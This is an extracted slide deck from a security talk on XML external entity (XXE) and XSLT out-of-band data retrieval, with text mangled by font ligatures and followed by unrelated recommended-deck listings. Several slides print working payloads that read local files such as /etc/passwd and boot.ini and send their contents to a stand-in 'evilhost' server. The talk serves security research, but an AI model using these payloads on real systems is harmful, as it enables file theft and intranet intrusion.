xml out of band data retrieval
play

XML Out-Of-Band Data Retrieval Timur Yunusov Alexey - PowerPoint PPT Presentation

Jun 25, 2023 •274 likes •750 views

XML Out-Of-Band Data Retrieval Timur Yunusov Alexey Osipov Who we are Timur Yunusov: Web Applica8on Security Researcher Interna8onal forum on

  1. XML ¡Out-­‑Of-­‑Band ¡Data ¡Retrieval ¡ Timur ¡Yunusov ¡ Alexey ¡Osipov ¡

  2. Who ¡we ¡are ¡ • Timur ¡Yunusov: ¡ – Web ¡Applica8on ¡Security ¡Researcher ¡ – Interna8onal ¡forum ¡on ¡prac8cal ¡security ¡«Posi8ve ¡ Hack ¡Days» ¡developer ¡ • Alexey ¡Osipov: ¡ – AFack ¡preven8on ¡mechanisms ¡Researcher ¡ – Security ¡tools ¡and ¡Proof ¡of ¡Concepts ¡developer ¡ • SCADA ¡StrangeLove ¡team ¡members ¡

  3. Agenda ¡ • XML ¡Overview ¡ • XML ¡eXternal ¡En88es ¡ • En88es ¡in ¡aFributes ¡ • Out-­‑Of-­‑Band ¡aFack ¡ – DTD ¡ – XSLT ¡ • Summary ¡ • Demos ¡ • Ques8ons ¡

  4. XML ¡OVERVIEW ¡

  5. XML ¡overview ¡ • Very ¡popular ¡protocol ¡lately ¡ – Serializa8on ¡ – SOA-­‑architecture ¡(REST, ¡SOAP, ¡OAuth) ¡ – Human-­‑readable ¡(at ¡least ¡intended ¡to ¡be) ¡ • Many ¡parsers/many ¡op8ons ¡controlling ¡ behavior ¡(over ¡9000) ¡ ¡ • Many ¡xml-­‑extensions ¡like ¡XSLT, ¡SOAP, ¡XML ¡ schema ¡ ¡

  6. XML ¡overview ¡ • Many ¡opportuni8es ¡lead ¡to ¡many ¡ vulnerabili8es: ¡ – Adobe ¡(@agarri_fr, ¡spasibo) ¡ – PostgreSQL ¡(@d0znpp), ¡PHP, ¡Java ¡ • Many ¡hackers ¡techniques ¡

  7. XML ¡EXTERNAL ¡ENTITY ¡

  8. XML ¡enAAes ¡ • En88es: ¡ – Predefined ¡ ¡ &amp; ¡&lt; ¡&#37; ¡ – General ¡ ¡ <!ENTITY ¡general ¡“hello”> ¡ – Parameter ¡ ¡ <!ENTITY ¡% ¡param ¡“hello”> ¡ • General ¡and ¡parameter ¡en88es ¡may ¡be: ¡ – Internal ¡(defined ¡in ¡current ¡DTD) ¡ – External ¡(defined ¡in ¡external ¡resource) ¡

  9. XXE ¡impact ¡ • Local ¡file ¡reading ¡ • Intranet ¡access ¡ • Host-­‑scan/Port-­‑scan ¡ • Remote ¡Code ¡Execu8on ¡(not ¡so ¡o_en) ¡ • Denial ¡of ¡Service ¡

  10. XXE ¡techniques ¡ • XML ¡data ¡output ¡(basic) ¡ • Error-­‑based ¡XXE ¡ – DTD ¡(invalid/values ¡type ¡defini8on) ¡ – Schema ¡valida8on ¡ • Blind ¡techniques ¡ ¡ – XSD ¡values ¡bruteforce ¡(@d0znpp) ¡

  11. Error ¡based ¡output ¡ • Schema ¡valida8on ¡In ¡Xerces ¡ parser ¡error ¡: ¡Invalid ¡URI: ¡: [file] ¡ I/O ¡warning ¡: ¡failed ¡to ¡load ¡external ¡en8ty "[file]“ ¡ parser ¡error ¡: ¡DOCTYPE ¡improperly ¡terminated ¡ Warning: ¡*** ¡ [file] ¡in ¡*** ¡on ¡line ¡11 ¡ <!DOCTYPE ¡html[ ¡ <!ENTITY ¡% ¡foo ¡SYSTEM ¡"file:///c:/boot.ini"> ¡ %foo;]> ¡

  12. XML ¡constraints ¡ • XML ¡validity/well-­‑formedness ¡ – WFC: ¡No ¡External ¡En8ty ¡References ¡… ¡ in ¡aBributes ¡ – WFC: ¡No ¡< ¡in ¡AFribute ¡Values ¡ – WFC: ¡PEs ¡in ¡Internal ¡Subset ¡

  13. Parameter ¡enAAes ¡ resolve/validaAon ¡algorithm ¡ <?xml ¡version="1.0" ¡encoding="uq-­‑8"?> ¡ <!DOCTYPE ¡html ¡[ ¡ <!ENTITY ¡% ¡internal ¡SYSTEM ¡"local_file.xml"> ¡ %internal;]> ¡ <!ENTITY ¡8tle ¡"Hello, ¡World!"> ¡]> ¡ <html>&8tle;</html> ¡ local_file.xml: ¡ <!ENTITY ¡8tle ¡"Hello, ¡World!"> ¡

  14. XXE ¡aJacks ¡restricAons ¡ • XML ¡parser ¡reads ¡only ¡valid ¡xml ¡documents ¡ – No ¡binary ¡=( ¡ ¡ ¡ ¡ ¡ (hFp://www.w3.org/TR/REC-­‑xml/#CharClasses) ¡ ¡ – Malformed ¡first ¡string ¡(no ¡encoding ¡aFribute) ¡ (Some ¡parsers) ¡ – But ¡we ¡have ¡wrappers! ¡ • Resul8ng ¡document ¡should ¡also ¡be ¡valid ¡ – No ¡external ¡en88es ¡in ¡aFributes ¡

  15. ENTITIES ¡IN ¡ATTRIBUTES ¡

  16. System ¡enAAes ¡restricAons ¡ ¡bypass ¡within ¡aJributes ¡ Well-­‑formed ¡constraint: ¡ ¡ – No ¡External ¡En8ty ¡References ¡ • So, ¡this ¡is ¡not ¡possible, ¡right? ¡ <!DOCTYPE ¡root[ ¡ ¡<ENTITY ¡internal ¡SYSTEM ¡"file:///etc/passwd"> ¡ ]> ¡ <root ¡aFrib="&internal;“/> ¡ ¡

  17. System ¡enAAes ¡restricAons ¡ ¡bypass ¡within ¡aJributes ¡ <?xml ¡version="1.0" ¡encoding="uq-­‑8"?> ¡ <!DOCTYPE ¡root ¡[ ¡ <!ENTITY ¡% ¡remote ¡SYSTEM ¡"hFp://evilhost/evil.xml"> ¡ %remote; ¡ <!ENTITY ¡internal ¡'[boot ¡loader] ¡8meout ¡***'> ¡ %param1; ¡]> ¡ <root ¡aFrib="&internal;" ¡/> ¡ Evil.xml ¡ <!ENTITY ¡% ¡payload ¡SYSTEM ¡"file:///c:/boot.ini"> ¡ <!ENTITY ¡% ¡param1 ¡"<!ENTITY ¡internal ¡'%payload;'>"> ¡

  18. PaJern ¡validaAon ¡ ¡ ¡ ¡ ¡<xs:restric8on ¡base="xs:string"> ¡ ¡ ¡ ¡ ¡ ¡ ¡<xs:paFern ¡value="&test;" ¡/> ¡ ¡ ¡ ¡ ¡</xs:restric8on> ¡

  19. DEMO ¡

  20. OUT-­‑OF-­‑BAND ¡ATTACK ¡

  21. XXE ¡aJacks ¡restricAons ¡ Server-­‑side ¡in ¡general ¡(except ¡Adobe ¡XXE ¡SOP ¡ bypass) ¡

  22. XXE ¡OOB ¡

  23. XXE ¡OOB ¡ What ¡other ¡OOB ¡communica8on ¡techniques ¡are ¡ present? ¡ ¡ DNS ¡exfiltra8on ¡via ¡SQL ¡Injec8on ¡(@stamparm) ¡ UTL_HTTP.REQUEST ¡ ¡ xp_fileexist ¡ Dblink ¡ LOAD_FILE ¡

  24. XXE ¡OOB ¡ <?xml ¡version="1.0" ¡encoding="uq-­‑8"?> ¡ <!DOCTYPE ¡root ¡[ ¡ <!DOCTYPE ¡root ¡SYSTEM ¡ “hBp://evilhost/xml.xml”> ¡ <!ENTITY ¡% ¡remote ¡SYSTEM ¡"hFp://evilhost/evil.xml"> ¡ <root> ¡ ¡ ¡ ¡&trick; ¡ %remote; ¡ </root> ¡ %int; ¡ <!ENTITY ¡% ¡trick ¡SYSTEM ¡'hFp://evil/?%5Bboot%20'> ¡ %trick;]> ¡ Evil.xml ¡ <!ENTITY ¡% ¡payl ¡SYSTEM ¡"file:///c:/boot.ini"> ¡ <!ENTITY ¡% ¡int ¡" ¡ <!ENTITY ¡&#37; ¡trick ¡SYSTEM ¡'hFp://evil/?%payl;'> ¡ "> ¡

  25. XXE ¡OOB ¡ DTD ¡Parsing, ¡ SYSTEM ¡reading ¡ XML ¡ AFacker ¡ Server ¡ PROFIT! ¡

  26. Parsing ¡restricAons ¡ • Beside ¡restric8ons ¡of ¡all ¡en88es ¡there ¡are ¡also ¡ new ¡ones ¡ • “PEReferences ¡forbidden ¡in ¡internal ¡ subset” ¡(c) ¡XML ¡Specifica8on ¡ – So ¡we ¡should ¡be ¡able ¡to ¡read ¡some ¡external ¡ resource ¡(local ¡or ¡remote) ¡ – Wrappers ¡

  27. Parsing ¡restricAons ¡ • Quotes ¡are ¡blocking ¡defini8on ¡of ¡en88es ¡ – One ¡should ¡try ¡single/double ¡quotes ¡when ¡ defining ¡en8ty ¡ ¡ <!ENTITY ¡% ¡int ¡"<!ENTITY ¡&#37; ¡trick ¡‘[file ¡ content’]’>" ¡ • Space/new ¡line/other ¡whitespace ¡symbols ¡ should ¡not ¡appear ¡in ¡URI ¡ – Wrappers ¡again ¡=) ¡ – Or ¡not ¡even ¡needed ¡

  28. Vectors ¡ • Depending ¡on ¡parser ¡features ¡– ¡lack ¡of ¡DTD ¡ valida8on ¡in ¡main ¡document ¡doesn’t ¡mean ¡ lack ¡of ¡valida8on ¡everywhere. ¡Some ¡possible ¡ clues: ¡ – External ¡DTD ¡or ¡Internal ¡DTD ¡subset ¡from ¡external ¡ data ¡ – Parameter ¡en88es ¡only ¡ – XSD ¡Schema ¡ – XSLT ¡template ¡

  29. Vectors ¡ • <!DOCTYPE ¡root ¡SYSTEM ¡“…”> ¡ • <!ENTITY ¡external ¡PUBLIC ¡“some_text” ¡“…”> ¡ • <tag ¡xsi:schemaLoca8on=“…”/> ¡ ¡ • <tag ¡xsi:noNamespaceSchemaLoca8on=“…”/> ¡ ¡ • <xs:include ¡schemaLoca8on=“…”> ¡ • <xs:import ¡schemaLoca8on=“…”> ¡ • <?xml-­‑stylesheet ¡href=“…”?> ¡

  30. XSLT ¡OUT-­‑OF-­‑BAND ¡

  31. XSLT ¡OOB ¡ • Controlling ¡XSLT ¡transforma8on ¡template ¡we ¡ can ¡access ¡some ¡data ¡from ¡sensi8ve ¡host: ¡ <xsl:variable ¡name="payload" ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡select="document('hBp://sensiXve_host/',/)"/> ¡ <xsl:variable ¡name="combine" ¡ ¡ ¡ ¡ ¡ ¡select="concat('hBp://evilhost/', ¡$payload)"/> ¡ <xsl:variable ¡name="result" ¡ ¡ ¡ ¡ ¡ ¡select="document($combine)" ¡/> ¡

Recommend

Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Inf1-DA 20102011 III: 51 / 89 Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval Statistical Analysis of Data: III.2 Data scales and summary statistics III.3 Hypothesis testing and correlation III.4

344 views • 17 slides
Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Inf1-DA 20102011 III: 68 / 91 Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval Statistical Analysis of Data: III.2 Data scales and summary statistics III.3 Hypothesis testing and correlation III.4 2

729 views • 24 slides
Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Inf1-DA 20102011 III: 68 / 91 Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval Statistical Analysis of Data: III.2 Data scales and summary statistics III.3 Hypothesis testing and correlation III.4 2

579 views • 8 slides
Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval

Inf1-DA 20102011 III: 28 / 89 Part III Unstructured Data Data Retrieval: III.1 Unstructured data and data retrieval Statistical Analysis of Data: III.2 Data scales and summary statistics III.3 Hypothesis testing and correlation III.4

455 views • 23 slides
Retrieval by Content Image Retrieval Image Retrieval Problem Large Image and video data sets

Retrieval by Content Image Retrieval Image Retrieval Problem Large Image and video data sets

1 Retrieval by Content Image Retrieval Image Retrieval Problem Large Image and video data sets are common Family birthdays Remotely sensed images (NASA) Retrieval by Content appealing as datasets get large Find similar

388 views • 36 slides
XML Retrieval XML Retrieval XML Retrieval XML Retrieval DB/IR in DB/IR in Theory Theory Web

XML Retrieval XML Retrieval XML Retrieval XML Retrieval DB/IR in DB/IR in Theory Theory Web

XML Retrieval XML Retrieval XML Retrieval XML Retrieval DB/IR in DB/IR in Theory Theory Web in Web in Practice Practice Sihem Amer-Yahia Mariano Consens Yahoo! Research University of Toronto In collaboration with: Ricardo Baeza-Yates

1.06k views • 59 slides
Data Organization - B-trees Data organization and retrieval File organization can improve data

Data Organization - B-trees Data organization and retrieval File organization can improve data

Data Organization - B-trees Data organization and retrieval File organization can improve data retrieval time 100 blocks SELECT * FROM depositors 200 recs/block Query returns 150 records WHERE bname=Downtown Ordered File Heap Brighton

1.07k views • 80 slides
1 What is multimedia information retrieval? 1.1 Information retrieval 1.2 Multimedia 1.3

1 What is multimedia information retrieval? 1.1 Information retrieval 1.2 Multimedia 1.3

1 What is multimedia information retrieval? 1.1 Information retrieval 1.2 Multimedia 1.3 Semantic Gap? 1.4 Challenges of automated multimedia indexing 2 Basic multimedia search technologies 2.1 Meta-data driven retrieval 2.2 Piggy-back text

902 views • 56 slides
Radio/microwave band The electromagnetic spectrum Infra red band Optical band UV band X-ray

Radio/microwave band The electromagnetic spectrum Infra red band Optical band UV band X-ray

The he mul ulti ti-wavele elength ngth mul ulti ti-tempor temporal al sk sky Radio/microwave band The electromagnetic spectrum Infra red band Optical band UV band X-ray band -ray band TeV band Radio/microwave band Infra red

692 views • 42 slides
The American Oystercatcher Band Database: Submitting Data to the Bird Banding Lab Jo Lutmerding,

The American Oystercatcher Band Database: Submitting Data to the Bird Banding Lab Jo Lutmerding,

The American Oystercatcher Band Database: Submitting Data to the Bird Banding Lab Jo Lutmerding, BBL Lindsay Addison, Audubon NC AMOY Band Database Data sharing agreement: Data submitted to the American Oystercatcher Band Database will

240 views • 9 slides
Welcome to the Washington Warrior Band Program DARIEN M. ORR BAND DIRECTOR Phone: (217) 525-

Welcome to the Washington Warrior Band Program DARIEN M. ORR BAND DIRECTOR Phone: (217) 525-

Welcome to the Washington Warrior Band Program DARIEN M. ORR BAND DIRECTOR Phone: (217) 525- 3182 Ext. 160 Email: darienorr@sps186.org Benefits of Band Band provides the opportunity to create. Band builds a sense of community,

286 views • 9 slides
Band Presentation: By Leigh Maisey Initial Band The Scene and Herd Band Change Red Sky Was

Band Presentation: By Leigh Maisey Initial Band The Scene and Herd Band Change Red Sky Was

Band Presentation: By Leigh Maisey Initial Band The Scene and Herd Band Change Red Sky Was approached by Red Sky wanting some graphic design work done for the band. Band Briefing Logo Business Card Letterhead T Shirt Poster Logo

810 views • 23 slides
Data Cleansing for Web Information Retrieval Data Cleansing for Web Information Retrieval using

Data Cleansing for Web Information Retrieval Data Cleansing for Web Information Retrieval using

Data Cleansing for Web Information Retrieval Data Cleansing for Web Information Retrieval using Query Independent Features using Query Independent Features Yiqun Liu, Min Zhang, Liyun Ru, Shaoping Ma State Key Lab of Intelligent Tech. &amp;

313 views • 27 slides
NMCHS CONDOR Band Marching Band, DrumLine, Color Guard, Jazz Band Performances Band Reviews:

NMCHS CONDOR Band Marching Band, DrumLine, Color Guard, Jazz Band Performances Band Reviews:

NMCHS CONDOR Band Marching Band, DrumLine, Color Guard, Jazz Band Performances Band Reviews: Oct 12th: Cupertino Oct 19th: Santa Cruz Boardwalk Nov 2nd: Pismo Beach Nov 9th : Merced Uniforms Checks are important: Shoes, black socks,

550 views • 9 slides
Objective: Compatibility of microwave and infrared radiances for use in the retrieval algorithm.

Objective: Compatibility of microwave and infrared radiances for use in the retrieval algorithm.

Objective: Compatibility of microwave and infrared radiances for use in the retrieval algorithm. Procedure: For 29 months of data (Aug. 2003 - Dec. 2005), 1) Using both IR &amp; MW data, do cloud clearing and retrieval. If the retrieval passes

229 views • 22 slides
Two options for data collection and retrieval: STORET (STOrage and RETrieval) Water Quality

Two options for data collection and retrieval: STORET (STOrage and RETrieval) Water Quality

Two options for data collection and retrieval: STORET (STOrage and RETrieval) Water Quality Portal (WQP) 11/20/2014 U.S. EPA Region 5 Water Division Slide 6 of 10 Managed and supported by EPA It is the official EPA repository for

223 views • 11 slides
Band Orientation 2019 What is the SMS Band? The Shelburne band is a place where students have fun

Band Orientation 2019 What is the SMS Band? The Shelburne band is a place where students have fun

Band Orientation 2019 What is the SMS Band? The Shelburne band is a place where students have fun learning how to perform music for the community. Its a place where students learn teamwork , responsibility, work ethic, and discipline that

736 views • 45 slides
min ( ). ( , , ). ( , ) l i a i j k V j k i j k Where ( i )

min ( ). ( , , ). ( , ) l i a i j k V j k i j k Where ( i )

CE -751, SLD, Class Notes, Fall 2006, IIT Bombay m a x = 1 =1- x n a x = 1 x x=any time band. m=Time band into which zone j falls a x =The destination opportunities available in time band x n= The last time band as measured

245 views • 23 slides
The Franklin Band The Franklin Band Overview Lets be clear on this: CONCERT BAND IS THE MOST

The Franklin Band The Franklin Band Overview Lets be clear on this: CONCERT BAND IS THE MOST

The Franklin Band The Franklin Band Overview Lets be clear on this: CONCERT BAND IS THE MOST IMPORTANT THING WE DO . W e are a concert band program that does marching band, not the other way around. Marching Band may be the most visible

423 views • 20 slides
WELCOME BAND PARENTS! Friday, May 19, 2017 CTJ Band Hall Our Kids Are Amazing!!! Upcoming

WELCOME BAND PARENTS! Friday, May 19, 2017 CTJ Band Hall Our Kids Are Amazing!!! Upcoming

WELCOME BAND PARENTS! Friday, May 19, 2017 CTJ Band Hall Our Kids Are Amazing!!! Upcoming Events May 19 th 2017-2018 Marching Band Kickoff Rehearsal May 26 th Spring Jazz Band Concert May 27 th 29 th UIL State Solo &amp; Ensemble Contest

392 views • 18 slides
Missing-data masks in all-combinations multi-band decoding It is shown that for MAP decoding

Missing-data masks in all-combinations multi-band decoding It is shown that for MAP decoding

morris@idiap.ch http://www.idiap.ch/ Missing-data masks in all-combinations multi-band decoding It is shown that for MAP decoding with all-comb experts multi-band expert weighting can make use of same soft missing-data mask as used with

477 views • 5 slides
Information Retrieval Introducing Information Retrieval and Web Search Information Retrieval

Information Retrieval Introducing Information Retrieval and Web Search Information Retrieval

Introduction to Information Retrieval Introducing Information Retrieval and Web Search Information Retrieval Information Retrieval (IR) is finding material (usually documents) of an unstructured nature (usually text) that satisfies an

1.01k views • 57 slides
Learning Learning Retrieval Knowledge Retrieval Knowledge from Data from Data Helge Langseth

Learning Learning Retrieval Knowledge Retrieval Knowledge from Data from Data Helge Langseth

Learning Learning Retrieval Knowledge Retrieval Knowledge from Data from Data Helge Langseth Norwegian University of Science and Technology, Dept. of Mathematical Sciences Agnar Aamodt Norwegian University of Science and Technology,

602 views • 30 slides
Chapter III: Ranking Principles Information Retrieval &amp; Data Mining Universitt des

Chapter III: Ranking Principles Information Retrieval &amp; Data Mining Universitt des

Chapter III: Ranking Principles Information Retrieval &amp; Data Mining Universitt des Saarlandes, Saarbrcken Wintersemester 2013/14 Chapter III: Ranking Principles III.1 Boolean Retrieval &amp; Document Processing Boolean Retrieval,

784 views • 77 slides

More recommend